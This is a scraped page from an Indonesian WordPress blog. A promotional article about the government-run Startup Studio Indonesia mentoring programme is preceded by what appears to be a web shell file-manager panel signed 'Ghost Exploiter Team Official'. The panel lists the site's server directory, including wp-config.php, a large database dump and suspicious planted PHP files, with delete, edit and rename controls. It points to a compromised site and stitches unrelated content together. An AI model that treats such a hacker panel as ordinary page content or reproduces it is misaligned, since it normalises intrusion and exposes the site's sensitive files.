Ghost Exploiter Team Official

/var/www/html/elmuha.net/
Nama File / Folder Size Action
wp-admin -- NONE
wp-content -- NONE
wp-includes -- NONE
.htaccess 5.58KB Hapus Edit Rename
RxRpewtz.php 0.981KB Hapus Edit Rename
ads.txt 0.057KB Hapus Edit Rename
db.sql 155.58MB Hapus Edit Rename
hero.php 34.223KB Hapus Edit Rename
index.php 7.908KB Hapus Edit Rename
laius.php 44.256KB Hapus Edit Rename
license.txt 19.448KB Hapus Edit Rename
readme.html 7.226KB Hapus Edit Rename
robots.txt 0KB Hapus Edit Rename
uxo.txt 0.001KB Hapus Edit Rename
wp-activate.php 7.042KB Hapus Edit Rename
wp-blog-header.php 0.343KB Hapus Edit Rename
wp-config-sample.php 2.942KB Hapus Edit Rename
wp-config.php 3.169KB Hapus Edit Rename
wp-cron.php 5.506KB Hapus Edit Rename
wp-load.php 3.835KB Hapus Edit Rename
wp-settings.php 25.002KB Hapus Edit Rename
wp-trackback.php 4.771KB Hapus Edit Rename
Besarkan Bisnis Startupmu dengan Program Startup dari Menkominfo | Elmuha Net

Besarkan Bisnis Startupmu dengan Program Startup dari Menkominfo

Program Startup

Saat ini persaingan antar Startup semakin sengit. Namun meskipun banyak Startup bermunculan, mayoritas sebenarnya lebih banyak yang mengalami kegagalan saat membangun bisnis di permulaan. Hal ini terjadi karena banyak hal, beberapa di antaranya adalah karena kurang tepatnya menentukan consumer, gagal dalam manajemen operasional, defisit keuangan, kurangnya penyerapan pasar, dan faktor-faktor lainnya.

Membangun Startup seperti halnya membangun bisnis, maka membutuhkan banyak pengetahuan dan kemampuan yang piawai oleh para penggagasnya jika ingin sukses dan bertahan lama di kancah persaingan. Apapun jenis Startupnya, jika dikelola tanpa kemampuan yang baik maka hanya akan berkibar di awal lalu jatuh kemudian.

Agar Startupmu tidak gagal bahkan ketika baru di awal, maka program startup yang berupa mentoring dan pelatihan bisa meningkatkan kemampuan dalam mengelola manajemen Startup dengan baik. Untuk mencari program Startup yang bisa memberikan banyak keuntungan tentu tidak mudah, Kemkominfo melalui Startup Studio Indonesia saat ini bisa dijadikan pilihan oleh pemilik Startup yang ingin mengembangkan skala bisnisnya.

Startup Studio hadir untuk menjawab masalah yang sering dihadapi oleh Startup Digital di Indonesia. Program yang diselenggarakan oleh Kementrian ini memiliki program untuk memberdayakan Startup di tahap awal utamanya untuk mengakselerasi produk serta tim Startup, dan untuk strategi mengembangkan produk yang bisa sesuai dengan kebutuhan pasar yang dituju. Selain itu, Startup Studio juga memberikan pelatihan di bidang penting lainnya dalam mengembangkan Startup seperti pemasaran, pengembangan teknologi, serta kemampuan berbisnis yang tentu sangat dibutuhkan untuk membangun Startup baru.

Program Startup yang berkualitas akan sangat membantu dalam pengembangan Startupmu agar tidak menemui jalan buntu. Di Startup Studio, ada program-program yang intensif untuk melatih kemampuan dalam strategi pengembangan produk, teknologi, tim, dan pemasaran. Bidang-bidang yang memang menjadi perhatian penting dalam pengembangan sebuah Startup.

Baca juga :  Cari Uang Modal Laptop & Koneksi Internet, Bahkan Pakai HP Saja

Di Startup Studio, ada program Coaching 1-on-1 yakni pelatihan bersama founder dan para ahli yang berpengalaman di bidang khusus dengan tujuan utama mengembangkan produk yang bisa diterima oleh pasar dengan baik, penentuan pasar yang sesuai dengan produk, serta strategi lainnya yang bisa mendukung suksesnya pengembangan awal untuk bisnis Startup.

Program menarik di Startup Studio lainnya adalah adanya pelatihan dalam bentuk Founder’s  Camp yang memberikan kesempatan kepada pelaku Startup untuk berkumpul dan berdiskusi dengan para founder Startup yang berpengalaman untuk mengembangkan bisnis dalam usaha mencapai kesesuaian produk dan pasar.

Di Founder’s Camp, Startup yang terpilih bisa mendapatkan ilmu praktis untuk meningkatkan kemampuan di bidang-bidang yang krusial bagi sebuah Startup agar sukses di kancah persaingan yang semakin pesat. Bidang yang akan didiskusikan meliputi strategi produk, cara mendapatkan dana serta legalitas, strategi pemasaran yang ampuh, manajemen kepemimpinan, dan beberapa bidang lainnya.

Coach di Startup Studio juga semuanya memiliki pengalaman yang terbukti bisa membangun startup dengan sukses. Pada program batch 2, ada banyak coach dari perwakilan perusahaan digital besar seperti Gojek, Sociolla, Halodoc, Ralali, Tiket.com, dan banyak lagi lainnya.

Startup-startup yang sudah mengikuti program tahap awal di antaranya Woobiz, Tumbasin, Rekosistem, Moodah, Jejak.in, Biteship, dll. Dari testimoni yang mereka sampaikan juga semuanya puas dengan pelatihan dan program startup yang diselenggarakan oleh Startup Studio Indonesia ini.

Jika kamu ingin Startup yang sedang dibangun di tahap awal bisa sukses dan punya strategi yang ciamik, maka segera daftar ke Startup Studio untuk mendapatkan pelatihan bisnis. Program Startup ini juga gratis alias tidak ada pungutan biaya kepada peserta. Pelaksanaannya juga fleksibel yang diadakan baik secara offline maupun online.

Baca juga :  UMK Jawa Barat 2020, 7 daerah ini makmur SEJAHTERA

Jika Startupmu terpilih, maka ada banyak keuntungan yang akan didapatkan antara lain pelatihan dan mentoring selama 3 bulan oleh coach yang berpengalaman di bidangnya secara daring, akses langsung ke pakar untuk mentoring, dan beberapa keuntungan lainnya yang akan sangat mendukung Startupmu untuk maju lebih cepat.

Dengan mengikuti program Startup, kemampuan yang spesifik serta teruji dan langsung diajarkan oleh mentor yang sudah berpengalaman langsung di perusahaan besar, akan diperoleh demi bisa mencapai target awal yang diharapkan oleh para foundernya.

Originally posted 2021-05-03 04:08:16.

Tinggalkan komentar